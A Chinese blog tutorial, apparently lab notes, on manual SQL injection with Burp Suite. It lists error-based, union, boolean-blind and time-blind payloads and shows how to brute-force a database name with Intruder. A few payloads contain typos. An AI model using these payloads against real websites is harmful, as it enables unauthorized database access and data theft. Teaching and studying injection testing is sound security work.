Burpsuit抓包手工注入SQL

最新推荐文章于 2025-03-29 00:00:00 发布
最新推荐文章于 2025-03-29 00:00:00 发布
阅读量347 收藏 1
点赞数
文章标签: sql 数据库 mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lucasde/article/details/133974824
版权
探讨了使用Burpsuit进行不同类型的注入攻击(如错误注入、联合查询、布尔和时间盲注)以获取数据库信息的方法,涉及POST请求的利用策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.Burpsuit抓包报错注入

报错注入:

updatexml(1,concat(0x7e,database(),0x7e),1)

select *from users where id = '1' and updatexml()

例子:

updatexml(1,concat(0x7e,database(),0x7e),1)

updatexml(1,concat(0x7e,select 1,0x7e),1)

二.Burpsuit联合注入

Union注入:

order by n--+

union select 1,2,3.....--+

例子:

union select 1,database()--+

三.Burpsuit布尔盲注

布尔盲注:

1=1--+/1=2--+

length(database())>1--+

例子:

length(database())>1--+

substr(database(),1,1)='a'--+

ascii(substr(database(),1,1)=115--+

1723字节表示存在布尔盲注

1677字节表示没有

根据猜测得到的消息,数据库长度为8,且第一个字母是‘s',所以我们直接将数据包发送到intruder进行爆破,选择集束炸弹联合爆破去着剩下的数据库字母

四.Burpsuit时间盲注

时间盲注:

if(length(database())>1,sleep(3),1)--+

例子:

if(length(database())>1.sleep(3),1)--+

if(substr(database(),1,1)='a',sleep(3),1)--+

if(ascii(substr(database(),1,1))=115,sleep(3),1)--+

如果存在时间盲注,右下角的时间会变化,比如我加了0.3,成倍数增加的话,响应时间就是三秒左右,如果没有时间盲注,基本就是立马响应。

同理,这个是POST型请求,所以得在下面的数据注入才行,然后同样的进行集束炸弹联合爆破,

可以找到数据库的名称。

Lucas Lucas
关注
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6097
BurpSuit官方实验室靶场-SQL注入通关记录。
burp 官方靶场 第二章 sql注入
2301_78362619的博客
02-01 1382
要在每个位置测试字符,您需要在您定义的有效负载位置发送合适的有效负载。或者,您可以创建一个具有两个有效载荷位置和“集束炸弹”攻击类型的单个入侵者攻击,并通过偏移量和字符值的所有排列进行工作。现在,您只需对密码中的其他每个字符位置重新运行攻击,以确定它们的值。为此,请返回到主Burp窗口和Burp Intruder的Positions选项卡,并将指定的偏移量从1更改为2。当条件不再为真时(即“欢迎回来”消息消失时),您已经确定了密码的长度,实际上是20个字符长。该行显示的有效载荷是第一个位置的字符的值。
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
weixin_60677557的博客
07-05 2484
SQL注入SQLi)是一种Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或行为发生持久更改。在某些情况下,攻击者可以升级SQL注入攻击以危及底层服务器或其他后端基础架构,或执行拒绝服务攻击。
利用Burpsuite精通SQL注入测试
weixin_43822401的博客
07-13 1244
SQL注入攻击是Web安全领域最常见且危害极大的漏洞之一。Burpsuite作为一款强大的Web安全测试工具,提供了一系列的功能来帮助安全专家发现并防御SQL注入。本文将详细介绍如何使用Burpsuite进行SQL注入测试,包括POST方式的注入、盲注技术以及HTTP头注入等高级技巧。Burpsuite是一款集成了多种Web安全测试功能的软件,它支持多种操作系统,包括在Kali Linux中的免费版本。通过代理服务器的功能,Burpsuite能够拦截、分析和修改HTTP请求和响应。
【Pyhon】利用BurpSuite到SQLMap批量测试SQL注入
weixin_30478923的博客
11-13 727
前言 通过Python脚本把Burp的HTTP请求提取出来交给SQLMap批量测试,提升找大门户网站SQL注入点的效率。 导出Burp的请求包 配置到Burp的代理后浏览门户站点,Burp会将URL纪录存储在HTTP History选项卡的内容里 导出Burp的请求包到SQLMAP中测试SQL注入漏洞,可以通过【Filter】选择【Show only parametrized requ...
精通Burpsuite:SQL注入测试的实验操作步骤详解
weixin_43822401的博客
05-25 1865
在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过注入恶意SQL代码来操纵后端数据库Burpsuite作为一款领先的Web安全测试工具,提供了一系列的功能来帮助安全专家发现和防御这类漏洞。本文将详细介绍如何使用Burpsuite进行SQL注入测试的实验操作步骤。通过遵循这些详细的实验操作步骤,安全专家可以更有效地使用Burpsuite进行SQL注入测试。通过本文的指导,读者应该能够掌握使用Burpsuite进行SQL注入测试的关键步骤,提升自己的安全测试能力。
进一步熟练掌握burpsuite抓包功能;掌握SQL注入漏洞的基本原理;重现实验内容
qq_44696653的博客
03-24 3211
SQL-Inject漏洞的概念原理 概述:数据库注入漏洞,主要是开发人员在过后见代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构建的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。 一般的网站都会有一个相对应的数据库用来存放相关用户信息,在前端会有一个窗口用于用户输入用户id,按一般运作流程,在前端输入的信息将会被提交至应用程序,经过参数的转化会...
DVWA之SQL注入
qq_46416934的博客
07-29 1352
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
黑客学习-sql注入-字符型
weixin_49349476的博客
11-24 1626
判断sql漏洞的类型为字符型,利用post手工注入数据库信息,在利用busp进行注入,最终获取账号和密码
SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2158
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
SQL注入实战思路(补充)
qq_68727073的博客
06-29 685
红队:前期资产较多,一般使用漏扫工具,后期才会针对性进行手工注入蓝队:看请求头和响应包,返回字段长度,相应数字WAF主要通过匹配规则库中的敏感字符进行拦截。因此,绕过WAF的关键在于让输入的数据不被WAF识别为恶意字符。
抓包hook注入
wmburst
08-15 565
宝限制,启动必须走http不走内部的请求
Burp Suite抓包实战:SQL注入漏洞挖掘
最新发布
水务人
03-29 1916
本文系统解析如何利用Burp Suite专业版开展SQL注入漏洞的定向挖掘,涵盖手动探测、自动化利用、WAF绕过等进阶技巧。通过电商、金融等行业的真实渗透案例,详解从流量拦截到漏洞利用的全链路方法论,实现单日最高挖掘23个高危注入点的实战成果。
使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件
dzqxwzoe的博客
03-19 2075
每次测注入都是用burp的Intruder模块,很不方便就是批量跑批量测哪些没有过滤懒人鹅上线,准备搞一个sql测试的插件本篇文章代码量大,基础可以去看上一篇。
HttpCanary实现对HTTP2协议的抓包注入(原理篇)
热门推荐
weixin_34281477的博客
01-14 1万+
今天发布了HttpCanary2.0版本,除了修复了部分bug以及优化性能外,最主要的是支持了HTTP2协议。 HttpCanary是什么?Android平台第二强大的HTTP抓包注入工具,不了解的同学可以阅读下关于HttpCanary的介绍:juejin.im/post/5c1e37… HttpCanary2.0已经发布到GooglePlay,欢迎大家下载并给予评价建议,传送门:play.g...
burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
wangluoanquan111的博客
01-26 1499
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在优快云永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:优快云网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
视频笔记:Go 抓包、分析、注入 - John Leon
scdxmoe的专栏
11-08 1738
https://blog.lab99.org/post/golang-2017-09-23-video-packet-capture-analysis-with-go.html 什么是抓包  抓包是分析网络上的流量。 有线网络和无线网络不同 有线网络会由交换机根据 MAC 地址决定是否将包转发给你,和你无关的包是不会转发给你,除非用的不是交换机而是古董的 Hub。而无线
burpsuit 靶场(SQL injection)
wanan的博客
01-23 440
burpsuit 靶场(SQL injection)
SQL注入-盲注 Burp盲注方法
HAKUNAMATATATTA的博客
09-04 809
什么是盲注?有时目标存在注入,但在页面上没有如何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。
burpsuit安全测试
02-20
### 使用 Burp Suite 进行 Web 安全测试 #### 测试环境准备 为了有效地利用 Burp Suite 对 Web 应用程序进行安全评估,需先配置好工作环境。这包括安装并启动 Burp Suite 软件,在浏览器中设置代理服务器指向本地运行的 Burp 实例,从而让所有的 HTTP/HTTPS 请求都通过该软件过滤[^2]。 #### 功能组件介绍 Burp Suite 的核心价值在于其丰富的功能模块: - **Proxy**:作为中间人代理来捕获和操控客户端与服务端之间的通信流量; - **Spider**:自动爬取网站链接结构,收集更多可访问页面的信息; - **Intruder**:用于发起自定义模式下的批量请求,适用于暴力破解登录表单密码或其他形式的身份验证机制; - **Repeater**:允许手动重发之前捕捉到的消息,并支持编辑消息体内的任意部分再发送出去; - **Sequencer**:分析应用程序产生的会话令牌强度及其随机特性; 这些工具共同构成了一个完整的Web应用安全审计框架[^3]。 #### 开始实际操作 当一切就绪之后,就可以着手开展具体的测试活动了。例如,想要检查某个特定输入框是否存在 SQL 注入风险,则可以在 Proxy 中拦截住提交给服务器的数据包,接着借助 Repeater 或 Intruder 来尝试不同的恶意载荷组合看能否触发异常响应行为。对于更深入的研究,还可以启用 Scanner 执行全面扫描作业以期发现其他隐藏的安全隐患[^4]。 ```bash # 设置浏览器代理至127.0.0.1:8080 (默认情况下Burp使用的监听地址) http://example.com/ ``` 一旦发现了可疑之处或是确认存在某些缺陷时,务必遵循负责任披露的原则及时通知相关方加以修复处理[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值